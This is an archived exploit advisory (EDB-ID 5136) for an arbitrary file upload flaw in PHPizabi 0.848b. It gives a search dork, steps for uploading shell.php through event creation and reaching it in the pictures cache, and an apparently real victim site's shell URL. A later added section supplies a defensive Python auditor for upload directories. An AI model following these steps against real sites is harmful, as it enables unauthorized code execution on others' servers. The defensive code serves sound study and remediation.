PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload

EDB-ID: 5136

Author: ZoRLu

Type: webapps

Platform: PHP

Date: 2008-02-17


############################################
Powered by PHPizabi v0.848b C1 HFP1 remote file upload

author: ZoRLu

home: www.yildirimordulari.org

contact: trt-turk@hotmail.com

dork: "Powered by PHPizabi v0.848b C1 HFP1"

############################################

exploit:

http://localhost/izabi/system/cache/pictures/id_shell.php

- First, register on the website.

- Click "Create an event" and create an event (direct create-event URL: http://localhost/izabi/?L=events.create).

- Write an event title and description, set "show to" to All users, click the gözat (Browse) button and upload shell.php.

- Then go to the event page, right-click the uploaded photo, choose Properties from the menu and copy the URL.

example:

http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500

and 

exploit:

http://localhost/izabi/system/cache/pictures/xxx_shell.php

example web site:

http://bitchinindie.com/system/image.php?file=597_shell.php&width=500

exploit shell.php

http://bitchinindie.com/system/cache/pictures/597_shell.php
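The weakness the steps above rely on is an upload handler that trusts the submitted file name and writes it, unchanged, into a directory the web server executes scripts from (system/cache/pictures/). The following script is an added example, not part of the original advisory and not PHPizabi code: it shows the checks a hardened image upload path should run (content identified by magic bytes rather than by name, a script-extension check on every dot-separated component of the name, and extension/content agreement) and reuses them to audit an existing upload directory for files that should never have been stored. The sample files, the magic-byte table and the extension list are constructed for the demo; the name 597_shell.php is the one quoted in the advisory. Disabling script execution for the upload directory at the web server is the other half of the fix and is not covered by this code.

```python
"""Audit an image upload/cache directory for files that are not real images.

Added example, not part of the original advisory and not PHPizabi code.
The checks validate content (leading bytes) rather than the file name and
flag any stored file whose name carries a script extension anywhere in it.
"""
import os
import tempfile

# Allowlisted image types, identified by their leading bytes (constructed table).
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Extensions a web server may hand to an interpreter. Any of these appearing as
# any dot-separated component of a name is treated as dangerous, so that
# "x.php.jpg" is rejected as well as "x.php" (constructed list).
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar",
                     "cgi", "pl", "py", "sh", "asp", "aspx", "jsp"}


def name_is_dangerous(filename: str) -> bool:
    """True if any extension component of the name is a script extension."""
    parts = filename.lower().split(".")[1:]
    return any(p in SCRIPT_EXTENSIONS for p in parts)


def detect_image_type(data: bytes):
    """Return 'jpg', 'png' or 'gif' from the leading bytes, or None if unknown."""
    for kind, magics in IMAGE_MAGIC.items():
        if any(data.startswith(m) for m in magics):
            return kind
    return None


def validate_upload(filename: str, data: bytes):
    """Decide whether an upload may be stored as an image.

    Returns (ok, reason_or_kind). These are the checks a handler should run
    before writing anything into a web-served directory.
    """
    if name_is_dangerous(filename):
        return False, "script extension in file name"
    kind = detect_image_type(data)
    if kind is None:
        return False, "content is not a recognised image"
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    if ext == "jpeg":
        ext = "jpg"
    if ext != kind:
        return False, f"extension .{ext} does not match content type {kind}"
    return True, kind


def audit_directory(path: str) -> list:
    """Return the sorted names of files in `path` that fail validate_upload()."""
    findings = []
    for name in os.listdir(path):
        full = os.path.join(path, name)
        if not os.path.isfile(full):
            continue
        with open(full, "rb") as fh:
            head = fh.read(16)  # the magic bytes are all within the first 16 bytes
        ok, _reason = validate_upload(name, head)
        if not ok:
            findings.append(name)
    return sorted(findings)


def build_sample_dir() -> str:
    """Create a temp directory holding constructed sample files for a demo run."""
    d = tempfile.mkdtemp(prefix="pictures_")
    samples = {
        "12_photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 12,          # genuine JPEG header
        "13_logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 8,           # genuine PNG header
        "597_shell.php": b"<?php /* constructed placeholder */ ?>",  # name from the advisory
        "14_x.php.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 12,          # image body, double extension
        "15_fake.gif": b"<?php /* not an image */ ?>",               # image name, script body
    }
    for name, body in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(body)
    return d


if __name__ == "__main__":
    sample = build_sample_dir()
    for f in audit_directory(sample):
        print("suspicious:", f)
```

Run as a script it prints the three constructed files that should not be sitting in an image cache; pointed at a real directory, audit_directory() gives an incident responder a first list of files to pull for review, and validate_upload() is the gate to place in front of any write into that directory.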


##################################################

thanx: str0ke, FaLCaTa, ReD_KaN, edish, harded, aRKi, z3h!r, the_KaM!L, vur6un, siircicocuk, Dr. SaLTuK, kasırga(lavrens), avkidis, head_hunter

and all users of yildirimordulari.org

siircicocuk, where have you been, bro? Get on MSN, we've missed you :)))

## Whether yildirimordulari.org will open again or not, nobody knows, but one thing is known: it is a legend ##

#################################################

# milw0rm.com [2008-02-17]